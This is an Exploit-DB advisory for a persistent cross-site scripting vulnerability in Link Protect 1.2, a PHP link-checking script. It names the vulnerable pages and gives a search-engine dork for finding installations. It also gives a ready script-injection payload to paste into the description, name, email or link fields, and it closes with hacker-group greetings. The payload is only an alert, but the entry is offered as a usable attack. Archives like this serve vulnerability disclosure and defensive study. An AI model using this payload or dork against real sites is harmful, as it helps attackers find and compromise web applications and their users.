Link Protect 1.2 - Persistent Cross-Site Scripting

EDB-ID:

15637

CVE:

N/A




Platform:

PHP

Date:

2010-11-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Link Protect 1.2 XSS Vulnerabilities
# Date: 11-29-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10
# category: webapps/0day
# Dork : inurl:"sorry script'kiddies"
# Contact : shichemt@hotmail.com - http://www.shichemt-alen.com/


#Exploit : http://localhost/fail/linkcheck.php?linkid=++++++

---------- http://localhost/fail/contact_us.php

---------- http://localhost/fail/signup.php

Put "><script>alert("EPIC FAIL\nTunisia")</script> in description, name, email or link


############ Made in Tunisia +216 ############

Greets to :  Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}

-----------------------

xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...

& All Tunisian and Muslim Hackers...


############ Made in Tunisia +216 ############